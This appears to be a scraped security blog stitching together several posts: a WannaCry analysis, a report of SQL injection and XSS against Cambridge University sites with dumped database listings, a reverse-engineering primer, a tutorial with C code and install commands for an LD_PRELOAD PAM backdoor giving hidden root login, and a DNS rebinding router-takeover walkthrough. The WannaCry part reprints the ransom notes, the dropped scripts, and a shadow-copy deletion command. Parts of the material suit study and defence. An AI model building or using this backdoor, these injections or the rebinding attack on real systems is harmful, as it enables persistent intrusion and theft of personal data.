WannaCry Ransomware Analysis and what we know

What is “WannaCry” Ransomware?

“WannaCry” spread to hundreds of thousands of Windows machines in 150 different countries. This type of malware is known as ransomware, a piece of malware that encrypts certain files (with specific file extensions) then asks for some currency in return of your files back (in this case it was BTC a crypto-currency). Essentially holding your computer hostage. There exists over hundreds upon thousands of diverse types of ransomware but WannaCry is very special.

Within WannaCry you can select your language, this was because it spread all across the globe and was a very essential feature.


So how does the Ransomware spread and how do I patch?

If your Windows PC Hasn’t been patched with the newest update it can be infected through the network interface due to the vulnerability in the SMB network protocol. You can still be infected with the Windows update by clicking on the infected file (if it’s sent through an email or something)

The patch info can be found here: Security Update for Microsoft Windows SMB Server (4013389)

You can also be infected if the TCP port 445 is open as MalwareTech stated in a tweet.

WannaCry uses a Windows exploit that was created by the NSA’s Equation group called EternalBlue. What this exploit allows WannaCry to do is spread via SMB, a file transfer protocol used since Windows 95. WannaCry is capable of spreading to outdated Windows machines that are connected to a network with port 445 open. Once WannaCry infects one computer via SMB, it begins to scan internal IP addresses on the same network and infects those computers as well. To sum things up, if port 445 is open, WannaCry enters the network and uses the EternalBlue exploit, infects one computer, then spreads to every other computer on the same network.

Once infected, WannaCry begins encrypting your files. Once it finishes this task, you are given the notorious display of what has happened and how you can fix it. The Windows popup urges the victim to pay via Bitcoin. If the victim doesn’t pay within 7 days, the decryption key stored inside the operator’s CnC server will be deleted. Keep in mind even when the victim does pay the amount specified, in order to begin the decryption process, a person on the other side has to physically send you the decryption key, which means it’s never a full proof solution. Blogger and tech specialist MalwareTech managed to stop a significant amount of the ransomware from spreading by creating a sinkhole. Created almost accidentally due to WannaCry’s own coding error, MalwareTech registered a domain that was hardcoded within the ransomware. What was more surprising is how the domain that was discovered by him did not change within the ransomware program, it was rather persistent. Later on, a new variant of WannaCry was released without this “kill-switch”.

So what does all of this mean?
It means if you’re on a Windows machine that hasn’t been updated since October 2016 then prepare to get owned by WannaCry. It also proves that Operating System updates are essential and not just an annoying concept that bugs you every five minutes. Security patches and updates need to be taken seriously especially on a corporate level. A hospital was affected by this ransomware in the early stages, what if it were a bank? Because it is quite possible.

Mitigation recommendations:

  1. Make sure that all hosts are running and have enabled endpoint security solutions.
  2. Install the official patch (MS17-010) from Microsoft, which closes the affected SMB Server vulnerability used in this attack.
  3. Ensure that Kaspersky Lab products have the System Watcher component enabled.
  4. Scan all systems. After detecting the malware attack as MEM:Trojan.Win64.EquationDrug.gen, reboot the system. Once again, make sure MS17-010 patches are installed.

Samples observed in attacks so far:


Kaspersky Lab detection names:


Kaspersky Lab experts are currently working on the possibility of creating a decryption tool to help victims.

For Windows XP there is “wannakey” to  recover the infected system but the system must not of been rebooted.


IP Addresses associated with WannaCry


ips <- c(‘′,’′,’′,’′,’′,’’,

Most of the malicious IP Addresses seem to be located in Germany.

 Bitcoin wallets used by the attackers

For convenient bitcoin payments, the malware directs to a page with a QR code at btcfrog, which links to their main bitcoin wallet 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94. Image metadata does not provide any additional info.


Another Bitcoin wallet included in the attackers’ “readme.txt” from the samples are:
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn – 0.32 BTC

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw &



WannaCry and the Tor Network

For command and control, the malware extracts and uses Tor service executable with all necessary dependencies to access the Tor network:


A list of dropped files related to Tor service

In terms of targeted files, the ransomware encrypts files with the following extensions:

.der, .pfx, .key, .crt, .csr, .p12, .pem, .odt, .ott, .sxw, .stw, .uot, .3ds, .max, .3dm, .ods, .ots, .sxc, .stc, .dif, .slk, .wb2, .odp, .otp, .sxd, .std, .uop, .odg, .otg, .sxm, .mml, .lay, .lay6, .asc, .sqlite3, .sqlitedb, .sql, .accdb, .mdb, .dbf, .odb, .frm, .myd, .myi, .ibd, .mdf, .ldf, .sln, .suo, .cpp, .pas, .asm, .cmd, .bat, .ps1, .vbs, .dip, .dch, .sch, .brd, .jsp, .php, .asp, .java, .jar, .class, .mp3, .wav, .swf, .fla, .wmv, .mpg, .vob, .mpeg, .asf, .avi, .mov, .mp4, .3gp, .mkv, .3g2, .flv, .wma, .mid, .m3u, .m4u, .djvu, .svg, .psd, .nef, .tiff, .tif, .cgm, .raw, .gif, .png, .bmp, .jpg, .jpeg, .vcd, .iso, .backup, .zip, .rar, .tgz, .tar, .bak, .tbk, .bz2, .PAQ, .ARC, .aes, .gpg, .vmx, .vmdk, .vdi, .sldm, .sldx, .sti, .sxi, .602, .hwp, .snt, .onetoc2, .dwg, .pdf, .wk1, .wks, .123, .rtf, .csv, .txt, .vsdx, .vsd, .edb, .eml, .msg, .ost, .pst, .potm, .potx, .ppam, .ppsx, .ppsm, .pps, .pot, .pptm, .pptx, .ppt, .xltm, .xltx, .xlc, .xlm, .xlt, .xlw, .xlsb, .xlsm, .xlsx, .xls, .dotx, .dotm, .dot, .docm, .docb, .docx, .doc

The file extensions that the malware is targeting contain certain clusters of formats including:

  1. Commonly used office file extensions (.ppt, .doc, .docx, .xlsx, .sxi).
  2. Less common and nation-specific office formats (.sxw, .odt, .hwp).
  3. Archives, media files (.zip, .rar, .tar, .bz2, .mp4, .mkv)
  4. Emails and email databases (.eml, .msg, .ost, .pst, .edb).
  5. Database files (.sql, .accdb, .mdb, .dbf, .odb, .myd).
  6. Developers’ sourcecode and project files (.php, .java, .cpp, .pas, .asm).
  7. Encryption keys and certificates (.key, .pfx, .pem, .p12, .csr, .gpg, .aes).
  8. Graphic designers, artists and photographers files (.vsd, .odg, .raw, .nef, .svg, .psd).
  9. Virtual machine files (.vmx, .vmdk, .vdi).

The WannaCry dropper drops multiple “user manuals” on different languages:

Bulgarian, Chinese (simplified), Chinese (traditional), Croatian, Czech, Danish, Dutch, English, Filipino, Finnish, French, German, Greek, Indonesian, Italian, Japanese, Korean, Latvian, Norwegian, Polish, Portuguese, Romanian, Russian, Slovak, Spanish, Swedish, Turkish, Vietnamese

The example of a “user manual” in English:

What Happened to My Computer?
Your important files are encrypted.
Many of your documents, photos, videos, databases and other files are no longer accessible because they have been encrypted. Maybe you are busy looking for a way to
recover your files, but do not waste your time. Nobody can recover your files without our decryption service.

Can I Recover My Files?
Sure. We guarantee that you can recover all your files safely and easily. But you have not so enough time.
You can decrypt some of your files for free. Try now by clicking .
But if you want to decrypt all your files, you need to pay.
You only have 3 days to submit the payment. After that the price will be doubled.
Also, if you don’t pay in 7 days, you won’t be able to recover your files forever.
We will have free events for users who are so poor that they couldn’t pay in 6 months.

How Do I Pay?
Payment is accepted in Bitcoin only. For more information, click .
Please check the current price of Bitcoin and buy some bitcoins. For more information, click .
And send the correct amount to the address specified in this window.
After your payment, click . Best time to check: 9:00am – 11:00am GMT from Monday to Friday.
Once the payment is checked, you can start decrypting your files immediately.

If you need our assistance, send a message by clicking .

We strongly recommend you to not remove this software, and disable your anti-virus for a while, until you pay and the payment gets processed. If your anti-virus gets
updated and removes this software automatically, it will not be able to recover your files even if you pay!

It also drops batch and VBS script files, and a “readme”

Batch file

@echo off
echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs
echo SET om = ow.CreateShortcut("C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe.lnk")>> m.vbs

echo om.TargetPath = “C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe”>> m.vbs

echo om.Save>> m.vbs
cscript.exe //nologo m.vbs
del m.vbs
del /a %0


SET ow = WScript.CreateObject("WScript.Shell")
SET om = ow.CreateShortcut("C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe.lnk")
om.TargetPath = "C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe"


Just in case the user closed out the bright red dialog box, or doesn’t understand it, the attackers drop a text file to disk with further instruction. An example of their “readme” dropped to disk as “@Please_Read_Me@.txt” to many directories on the victim host. Note that the English written here is done well, with the exception of “How can I trust?”. To date, only two transactions appear to have been made with this 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn bitcoin address for almost $300:

Q: What's wrong with my files?

A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let’s start decrypting!

Q: What do I do?

A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Next, please find an application file named “@WanaDecryptor@.exe”. It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)

Q: How can I trust?

A: Don’t worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.

* If you need our assistance, send a message by clicking on the decryptor window.

Once started it immediately spawns several processes to change file permissions and communicate with tor hidden c2 servers:

  • attrib +h .
  • icacls . /grant Everyone:F /T /C /Q
  • C:\Users\xxx\AppData\Local\Temp\taskdl.exe
  • @WanaDecryptor@.exe fi
  • 300921484251324.bat
  • C:\Users\xxx\AppData\Local\Temp\taskdl.exe
  • C:\Users\xxx\AppData\Local\Temp\taskdl.exe

The malware checks the mutexes “Global\MsWinZonesCacheCounterMutexA” and “Global\MsWinZonesCacheCounterMutexA0”

to determine if a system is already infected. It also runs the command:

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

This results in an UAC popup that user may notice.

The malware use TOR hidden services for command and control. The list of .onion domains inside is as following:

  • gx7ekbenv2riucmf.onion
  • 57g7spgrzlojinas.onion
  • Xxlvbrloxvriy2c5.onion
  • 76jdd2ir2embyv47.onion
  • cwwnhwhlz52maqm7.onion
  • sqjolphimrr7jqw6.onion

Cambridge University and their glaring vulnerabilities they refuse to patch.

About a month ago I decided to audit Cambridge University. I was hoping to find some webapp vulnerabilities which I could then report to get a bounty of some kind. I did a very basic audit, tested for Cross Site Scripting (XSS), Local File Inclusion (LFI)  and some other vulnerabilities such as SQL Injection (SQLi).  What I discovered for such a reputable University is crazy and the fact they won’t even respond to emails clearly implies they do not care whatsoever.

The first page I tested for XSS was their library page at http://www.lib.cam.ac.uk/

Yes, you guessed it. Vulnerable.



the second page I tested was  http://webapps.fitzmuseum.cam.ac.uk

…and of course XSS yet again

Here’s my openbugbounty submission report: https://www.openbugbounty.org/reports/280729/



I also looked for other things like their robots.txt file which can be found at http://www.lib.cam.ac.uk/robots.txt

I decided to stop looking for XSS on Cambridge as this site is  just littered with them. Can’t really do much either as they are non-persistent. (this doesn’t mean they shouldn’t be patched)

So to sum up the rest of this post…


Ok …. now let’s get straight to the more serious vulnerabilities which they should of most definitely patched by now but unfortunately they can’t even respond to emails. They also don’t seem to care at all as stated previously.

I will however post proof that these vulnerabilities can be exploited and that they are very SERIOUS.

The first SQLi vulnerability appears to be error based:

The database appears to have 20 columns from testing:

The attacker can now find the vulnerable columns and continue exploiting to get the database names/tables and then extract the data from them.


web server operating system: Linux Debian 8.0 (jessie)
Apache 2.4.10
MySQL >= 5.0
[*] generate
[*] images
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


Database: mysql
[24 tables]
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |

And here is the data extracted from the user table in the [mysql] database. I decided to format it using Excel:

[click to enlarge image]

Data can be extracted from anyone of those databases, if a malicious attacker were to extract info from a different table within the database they could get Student Private Information, staff and even private research material stored in the mySQL database


I will now move onto the second SQLi vulnerability, this is on the admin sub-domain of Cambridge it has one database and over 400 tables.

Database: *
[424 tables]
| ActiveDataFeed |
| Admin |
| Affichage1Affichage1edu |
| Ansicht1 |
| Apply |
| Auftrag |
| Bestellungen |
| Campus |
| Channel_Data |
| Coefficients |
| Compagnie |
| DC_Data |
| DSProp_table |
| DWE_Subscriptions |
| DWE_Task_Attributes |
| DWE_Workflow_Documents |
| D_Abbreviation |
| D_Format |
| Economy |
| Editor |
| Employees |
| Etudiant |
| Film |
| FindCriteria |
| GDirectedRoute |
| Genre |
| Gruppen |
| Languages |
| LastName |
| Lieux |
| OperationStatus |
| PREFIX_order_return_state_lang |
| PREFIX_tab |
| PREFIX_timezone |
| PZ |
| Pilot |
| Propdesc_table |
| Publication |
| ROLE |
| S_LOG |
| SchemaInfo |
| Slot |
| SpecificationLink |
| Standorte |
| Station_Comment |
| Student |
| Studenten |
| SurveyRespondent |
| Tagebuch |
| ThumbnailKeyword |
| Titres |
| TotalMembers |
| Umfrage |
| VenuesNew |
| Volume |
| X_3945 |
| USER |
| keys |
| language |
| translation |
| about |
| account_level |
| accounts |
| actualites |
| add_irm |
| adminpwd |
| adminuser |
| agence |
| aggtest |
| alarms |
| aliastype |
| alike |
| app_user |
| applications |
| area |
| art |
| artist |
| attribut |
| audio |
| auto_id_tests |
| autore |
| autorizacaonfe |
| banners |
| based |
| be_users |
| been |
| binn_articles |
| binn_catalog_fields |
| binn_catprops |
| binn_catrights |
| binn_form39 |
| binn_imagelib_templ |
| binn_user_rights |
| bkp_ResourceFolder |
| categorylinks |
| cdb_access |
| cdb_adminactions |
| cdb_adminsessions |
| cdb_debates |
| cdb_forumrecommend |
| cdb_imagetypes |
| cdb_paymentlog |
| cdb_pluginvars |
| cdv_map_feature |
| cdv_passport_group |
| chat_users |
| cities |
| clients |
| clubconfig |
| cmRole |
| cmsusers |
| coherently |
| compositions |
| comune |
| conf |
| config |
| connectorswitches |
| content |
| continent |
| country |
| cpg132_users |
| cpg_config |
| credits |
| css_file |
| customers_basket |
| dbstudents |
| dbuser |
| department |
| dept_location |
| detrimental |
| developers |
| diary |
| dictionary |
| div_annotation_type |
| div_locality |
| div_poly_type |
| dpt_trans |
| dtb_bat_relate_products |
| dtb_blocposition |
| dtb_customer_reading |
| dtb_deliv |
| dtb_recommend_products |
| duvida |
| e107_user |
| employer |
| emu_services |
| eventi |
| ew_temi |
| extremes |
| ezin_authors |
| f_attributedependencies |
| f_options |
| f_spatialcontextgroup |
| festplatte |
| fiscal |
| foreigntest |
| form_data |
| forum_user_stat |
| fusion_user_groups |
| ganatlebe_ge |
| geo_Island |
| geraet |
| gesuche |
| glmm |
| grau_escolaridade |
| grind |
| groupe |
| gws_client |
| has |
| hersteller |
| history |
| honorsinfo |
| ibf_members_converge |
| imagelinks |
| images |
| interactions |
| interwiki |
| intranet_users |
| invite |
| isMember |
| itemnotafiscal |
| items_template |
| itens |
| jforum_smilies |
| jiveExtComponentConf |
| jiveGroupUser |
| jiveRoster |
| jiveRosterGroups |
| jiveUserProp |
| jiveVersion |
| jobs |
| jos_estadisticas |
| jos_jce_groups |
| jos_jce_plugins |
| jos_languages |
| jos_messages_cfg |
| jos_modules_menu |
| jos_moschat_users |
| jos_poll_data |
| jos_templates_menu |
| jos_vm_auth_group |
| jos_vm_cart |
| jos_vm_category_xref |
| jos_vm_currency |
| jos_vm_product_category_xref |
| jos_vm_product_type_parameter |
| jurosstrategy |
| kategorien |
| kauf_artikel |
| kpro_adminlogs |
| lending |
| liens |
| line_items_seq |
| liste_domaines |
| livre |
| loan |
| located |
| login_user |
| mailaddresses |
| manage |
| mapdata |
| marital_status |
| math |
| mein_doc_h |
| membership |
| mima |
| minutes |
| mitarbeiter |
| mlattach |
| modulerubriquephoto |
| monitoringi_ge |
| music_association |
| mymps_advertisement |
| mymps_member_album |
| ndash |
| networking |
| newsletter_recipients |
| nickel |
| nomarski |
| noncommercial |
| notafiscal_deducao |
| notizen |
| nuke_authors |
| nuke_autonews |
| nuke_bbgroups |
| nuke_bbtopics_watch |
| nuke_bbuser_group |
| nuke_bbvote_voters |
| nuke_config |
| nuke_counter |
| nuke_downloads_categories |
| nuke_downloads_downloads |
| nuke_downloads_modrequest |
| nuke_downloads_newdownload |
| nuke_links_modrequest |
| nuke_main |
| nuke_poll_desc |
| nuke_pollcomments |
| nuke_reviews_comments |
| nuke_session |
| nuke_stats_month |
| nuke_subscriptions |
| nulltest |
| obb_profiles |
| oil_bfsurvey_pro |
| oil_bfsurveypro_34 |
| oil_bfsurveypro_35 |
| oil_biolmed_entity_types |
| oil_dbcache |
| oil_modules_menu |
| oil_newsfeeds |
| oil_phocadownload |
| oil_phocadownload_categories |
| oil_phocagallery_votes |
| oil_rokdownloads |
| orders |
| organization |
| osc_manufacturers |
| osc_products_attributes |
| otherwise |
| package |
| pagelinks |
| paper |
| participate |
| periods |
| phorum_user |
| phpbb_banlist |
| phpbb_topics_watch |
| phpbb_vote_results |
| platforms |
| pma_relation |
| pma_table_coords |
| pma_table_info |
| polarised |
| poll_user |
| precipitation |
| preferences |
| presence |
| product |
| produtos |
| project_user_xref |
| property |
| province |
| pw_adminset |
| pw_forums |
| pw_hack |
| pw_wordfb |
| pwds |
| qrtz_simple_triggers |
| radacct |
| reciprocal_links |
| reciprocal_partnersites |
| registered |
| report |
| reserve |
| river |
| root |
| roots |
| rss |
| rss_subscription |
| sampleData |
| schema_info |
| seen |
| sf_guard_remember_key |
| singup |
| slserver |
| spip_caches |
| spip_meta |
| spip_mots |
| spip_versions |
| spip_versions_fragments |
| spip_visites |
| spip_visites_articles |
| stable |
| state |
| store3 |
| ststaff |
| stuser |
| subject |
| subscribe |
| sysadmin |
| system |
| t_snap |
| tables_priv |
| tb_nguoidungs |
| tblLayouts |
| tbl_login |
| tbl_works_categories |
| tblblogroles |
| tbllogins |
| tbuseraccounts |
| team |
| test_user |
| tester |
| three |
| time_zone_leap_second |
| transactions |
| trigger_depends |
| turizmi_ge |
| tusers |
| tx_tcdirectmail_clicklinks |
| u_n |
| un |
| uname |
| uniquetest |
| user_groups |
| user_nm |
| user_un |
| user_uname |
| user_usern |
| useradmin |
| userid |
| usern |
| usr_pw |
| vbulletin_session |
| vcd_CoversAllowedOnMediatypes |
| vcd_PornStudios |
| vcd_Pornstars |
| vcd_VcdToPornstars |
| vcd_VcdToSources |
| vendor |
| veranstalter |
| vertex |
| videos |
| vrls_listings |
| vrls_partners |
| vrls_xref_listing_type |
| vrls_xref_state_province |
| ways |
| webcal_config |
| webcal_entry_ext_user |
| win |
| wp_pod_types |
| wp_usermeta |
| writes |
| x_admin |
| xb0c |
| zo_kontakt_stelle |
| zones |

I don’t really want to drag this on so I will move straight onto the last SQLi Vulnerability:

And yes again, this can be exploited. 


Database: information_schema
[40 tables]

So the message here is simple: get your sh*t patched and stop compromising student/staff data!

I wrote this up pretty quick and only decided to include database names & tables as I don’t want to compromise Cambridge anymore than they already are.


hope you enjoyed this lil writeup:)

Beginners Guide To Reverse Engineering

So you want to learn to reverse engineer and don’t really know where to start, well in this post I will doing a basic write-up on how to get started as a beginner.

Some useful resources:









I have included links for x86 Assembly & C/C++ as this is needed before you start reversing.

I suggest you begin in this order:

  1. Learn the fundamentals of x86 Assembly using the links provided
  2. Familiarise yourself with a low level language such as C / C++
  3. Begin on simple x86 unix binaries. Crackme’s and ReverseMe’s will be listed below, they’re an easy way to start

CrackMe’s and ReverseMe’s to begin reversing




Recommended x86 Debuggers (disassembly analysis software)

Immunity Debugger is a branch of OllyDbg v1.10, with built-in support for Python scripting


OllyDbg is a free and powerful Windows debugger with a built-in disassembly and assembly engine. Very useful for patching, disassembling, and debugging.

Image result for olly debugger

Bypassing /etc/passwd via Backdoor

Please Note: This is a backdoor. You should already have root access to the machine. This is to help backdoor it so you can get back into this system.

My Goal:

Anyone familiar with linux rootkits should know what I’m talking about. When you backdoor a rooted linux system, you expect to be able to gain access again. You can add a user by using adduser, but that leaves the user in /etc/passwd that the sysadmin can easily remove. I want to essentially add a new user without adding it to /etc/passwd or /etc/shadow or creating a home directory AND I want to do this all as with root access without having to type in a password. The best way to do this is hijack the function(s) that parse /etc/passwd and add an exception and simply authenticate the root account information with a different name.

In laymens terms, running:
su – root
Will log in as root and will require a password. However, if we hook those functions, we can force anything like:

su – hijacker
Then the functions we create will have an exception that will allow a user (that doesn’t actually exist) to log in with root access from an unpriv’d account. Obviously this requires us to have root access at some point, but it’s a great backdoor.

My Methodology:

We want to watch the library calls that occur when logging into various accounts. I’m going to use ltrace, but I need to give it SUID so I can run it as an unprivileged user but still trace the root login library calls.

chmod 4755 /usr/bin/ltrace


ltrace -o trace.txt su –

This simply writes the ltrace output from su – (root login).

Now, among all of the expected calls like memset, strcmp, malloc, fgets, free, etc… there are some lib calls that are pertinent in the linux login process.

Some of the major ones are:
Note: When I say “for dlsym”, I just mean that I’m casting a static pointer as a function that will later be used with dlsym to point to the original function.

  • getpwnam_r

int getpwnam_r(const char *name, struct passwd *pwd, char *buf, size_t buflen, struct passwd **result);

for dlsym:

static int (*old_getpwnam_r)(const char*, struct passwd*, char*, size_t, struct passwd**);
old_getpwnam_r = dlsym(RTLD_NEXT, “getpwnam_r”);

  • pam_authenticate

    int pam_authenticate(pam_handle_t *pamh, int flags);

    for dlsym:

    static int (*old_pam_authenticate)(pam_handle_t*, int);
    old_pam_authenticate = dlsym(RTLD_NEXT, “pam_authenticate”);


  • pam_acct_mgmt

int pam_acct_mgmt(pam_handle_t*, int flags);

for dlsym:

static int (*old_pam_acct_mgmt)(pam_handle_t*, int);
old_pam_acct_mgmt = dlsym(RTLD_NEXT, “pam_acct_mgmt”)

Ok now, Let’s look at these one by one. We can look in the trace.txt file from the ltrace output.

Basic C File Foundation

Note: by default, some of the PAM files may be missing. The precompiled libraries come with the OS, but you may not have the developer files to reference. These are NOT NEEDED on the victim machine, but they are for you! You can get them here: https://packages.debian.org/wheezy/libpam0g-dev or by adding the repo in /etc/apt/sources.list and running “apt-get update && apt-get install libpam0g-dev -y” if you’re on debian.

This is going to be the start of the C file. Based on the man pages of the aforementioned functions, I’ve written the basic C file we’re going to use here:

#define _GNU_SOURCE
#include #include #include <security/pam_appl.h>
#include <security/pam_modules.h>

#define HIJACK_LOGIN “hijacker” /* Desired Invisible User */

static int (*old_pam_authenticate)(pam_handle_t*, int);
static int (*old_getpwnam_r)(const char*, struct passwd*, char*, size_t, struct passwd**);
static int (*old_pam_acct_mgmt)(pam_handle_t*, int);
static char *hijacker = NULL, *r00t = NULL;

void init(){
if(!hijacker || strcmp(hijacker, “”) || hijacker == NULL) /* LOL 3 ways of checking… */
hijacker = strdup(HIJACK_LOGIN); //declare dynamically on heap to call later…
if(!r00t || strcmp(r00t, “”) || r00t == NULL)
r00t = strdup(“root”); //declare dynamically on heap to call later…
old_pam_authenticate = dlsym(RTLD_NEXT, “pam_authenticate”);
old_getpwnam_r = dlsym(RTLD_NEXT, “getpwnam_r”);
old_pam_acct_mgmt = dlsym(RTLD_NEXT, “pam_acct_mgmt”);

This contains the 3 functions we’re going to use (we’ll derive these in a second)

Inspecting the LTRACE Output

Here is the first thing I noticed about 10 lines down:

getuid()      = 1001
malloc(48)      = 0x008dd250
realloc(NULL, 256)      = 0x008dd290
__errno_location()      = 0x7f2ee5dac6a8
getpwnam_r(0x7f2ee5794100, 0x8dd250, 0x8dd290, 256, 0x7fffcf3a20f8) = 0



int getpwnam_r(const char *name, struct passwd *pwd, char *buf, size_t buflen, struct passwd **result);

Looking at the MAN page or getpwnam_r, we can assume that the malloc() call was for a passwd struct.

Let’s look at this passwd struct which can be found in the man pages and/or by a simple google search as well as in the developer source files:

struct passwd {
char   *pw_name;      /* username */
char   *pw_passwd;     /* user password */
uid_t   pw_uid;      /* user ID */
gid_t   pw_gid;      /* group ID */
char   *pw_gecos;      /* user information */
char   *pw_dir;      /* home directory */
char   *pw_shell;      /* shell program */

Okay, so, let’s rewrite this function and set the “gid_t” to root (0). This is necessarily required, but let’s try it out anyways, just to be safe.

int getpwnam_r(const char *name, struct passwd *pwd, char *buf, size_t buflen, struct passwd **result){
init();      // call initialization file
if(strstr(name, hijacker)){     // check if the username passed through is the HIJACK_LOGIN
pwd -> pw_gid = 0;      // set group ID to root ( 0 )
return old_getpwnam_r(r00t, pwd, buf, buflen, result);
// set root GID and use the root accounts name in “r00t” static char*
return old_getpwnam_r(name, pwd, buf, buflen, result);
// if it was not our username, return the legitimate success/error

Okay, great! We can actually run this from a root accoutn, but we will get an “authentication error”. Because we’re root, it doesn’t matter, but this will NOT work from a normal account.

When we try this from a standard user account, it will not work. It will request a password. This is where PAM Authentication comes in.


int pam_authenticate(pam_handle_t *pamh, int flags);

We look at the man 3 pam_authenticate page and we see some vital information.
The name of the authenticated user will be present in the PAM item PAM_USER. This item may be recovered with a call to pam_get_item(3).

okay.. more work. Basically, since the username isn’t transferred in plain text, we need to use another function called “pam_get_item” to get the item PAM_USER. Shouldn’t be too hard.

If you’re still reading this tutorial, first off, thank you so much, secondly, I trust you can find the “pam_get_item” man page easily by now 🙂

I created a “pamuser” variable that will be cast as a void pointer-pointer and then compared to our HIJACK_LOGIN.
Again, the MAN pages dictate the success messages so we return “PAM_SUCCESS” (which is 0 if you look in the pam_types.h or other pam dev files). We return this regardless of flags or other parameters in the pam_handle_t struct. This gives the illusion our PAM authentication key was verified.

int pam_authenticate(pam_handle_t *pamh, int flags){
void *pamuser = NULL;      // populated in pam_get_item
pam_get_item(pamh, PAM_USER,(cost **void)&pamuser);
// Gets the username parameter passed
if(strstr(pamuser, hijacker))
return PAM_SUCCESS;     // If the user passed is HIJACK_LOGIN, return success message
return old_pam_authenticate(pamh, flags);
// otherwise, return the legitimate success/error

Testing and running it shows the following:

eulo@syntexsecurity:~$ su –
su: Authentication failure
eulo@syntexsecurity:~$ su – hijacker
su: Authentication failure

Notice that it asks for a password for the root account, but not for hijacker. This is good. however, we’re still getting a Authentication Failure because pam_acct_mgmt is the function that verifies our account’s validity. We need to also return a success messages here to become fully “Authenticated”.
At least now it’s not asking for a password!

Also, we get a segment overflow when running the login command from root.


int pam_acct_mgmt(pam_handle_t *pamh, int flags);

This is an identical set to that of the previous function. It even has the same return type. We are also still going to have to use pam_get_item to view the username.

I literally copied/pasted the code from the last function here and changed the names to “acc_mgmt” vs “authenticate”.


int pam_acct_mgmt(pam_handle_t *pamh, int flags){
void *pamuser = NULL;      // populated in pam_get_item
pam_get_item(pamh, PAM_USER,(cost **void)&pamuser);
// Gets the username parameter passed
if(strstr(pamuser, hijacker))
return PAM_SUCCESS;     // If the user passed is HIJACK_LOGIN, return success message
return old_pam_acct_mgmt(pamh, flags);
// otherwise, return the legitimate success/error

Testing it Out and How It Works:


From A ROOT Account
First, compile it as a shared library with GCC. Then add it to ld.so.preload.

You can do this with these following commands:
gcc -shared -fpic -o ./bypass.so main.c -ldl
echo “`pwd`/bypass.so” > /etc/ld.so.preload

su – hijacker

eulo@syntexsecurity:~$ su –
su: Authentication failure
eulo@syntexsecurity:~$ cat /etc/passwd | grep hijacker
eulo@syntexsecurity:~$ su – hijacker
eulo@syntexsecurity:~$ whoami

Using DNS Rebinding To Hack Routers

What you need

    • Webserver
    • Register a nameserver on a domain
    • Rebind (apt-get install rebind or click here)

So what is DNS Rebinding?

DNS rebinding occurs when a web server provides an IP that is different than its own, mainly for malicious reasons.The attack vector is providing the IP of the client in order to perform Cross Site Request Forgery (CSRF) attack . We will be using this to ‘hack’ routers. This works because somewhere between some and many consumer-grade routers are configured in such a way that, when you type the external IP address of the router from within the local LAN, it will take you to the router configuration page. The reason this works is because the router checks only where the packet is going, and not the interface through which it came in. This means that an internal host can access the router by the router’s INTERNAL or EXTERNAL IP. However, an external device can not access the router at all (without DNS rebinding or some sort of attack).

So how does it work?

Home User:
Web Server: (example.com)
FakeNameServer: (same as web server)
When a browser sends a request to a DNS server requesting the IP address of that server, the DNS server sends back all DNS records it has. Me -> RealNameServer ::: A Record for example.com Me <- RealNameServer ::: IPs For example.com:

Then the well-known TCP handshake: Me -SYN-> WebServer Me <–SYN/ACK– WebServer Me -ACK–> WebServer Me <–HTML/JS– WebServer Me -FIN–> WebServer Me <–FIN/ACK– WebServer Me -ACK–> WebServer

so DNS rebinding simply works like this:
Registered Nameserver: ns1.example.com [NS]

When we request an A record for the website, it provides two IP addresses.
example.com[A] -~-~-~->,

Set your nameserver to ns1.example.com in your registrar.
Now that you have that set up, we’re ready to begin. When the client requests your website, it will be provided with two different IP addresses: that of your web server, and that of their router. When they connect to you, you provide them with malicious HTML/JavaScript to automatically create requests to log into their router and perform your desired configuration changes. Me —> FakeNameServer ::: A Record for example.com Me <— FakeNameServer ::: IPs for example.com : and

As you can see, it adds whatever source address the request is coming from and says “use this as an IP” Me –SYN–> WebServer Me <–SYN/ACK– WebServer Me –ACK–> WebServer Me <–HTML/JS– WebServer ** This is MALICIOUS JAVASCRIPT Me –FIN–> WebServer Me <–RST– WebServer Me NEW IP ADDRESS FOR example.com: Me –SYN–> Router Me <–SYN/ACK– Router Me –ACK–> Router Me <–HTML/JS– Router *** This is the Router Login Page Me –FIN–> Router Me <–FIN/ACK– Router Me –ACK–> Router Malicious Webserver >>> Proxy via the Malicious Javascript >>> Router

Now the owner of the malicious web server has access to the router log in page for as long as the browser is open. The key behind the effectiveness of DNS rebinding is that many routers have default passwords that users do not change (ie: admin/admin, admin/password, root/, admin/, etc.). Once you’re in the router, enable remote administration (if accessible) and set a password (that you know) and you will be able to remote into the router. From there, you can run the same attack over and over, sniffing the network, DNS cache poisoning, or other network attacks.

Actually Running the Attack

Alright, as I said earlier, you must have the nameserver configured in your DNS manager and set your website’s nameserver to itself.

Note: If you are behind a NAT or Firewall, you must have ports 53, 80 and 81 “forwarded” and allowed.

The command:
./rebind -i eth0 -d example.com

-i = the interface through which incoming connections travel
-d example.com = the domain you have registered

[+] Starting DNS server on port 53
[+] Starting attack Web server on port 80
[+] Starting callback Web server on port 81
[+] Starting proxy server on

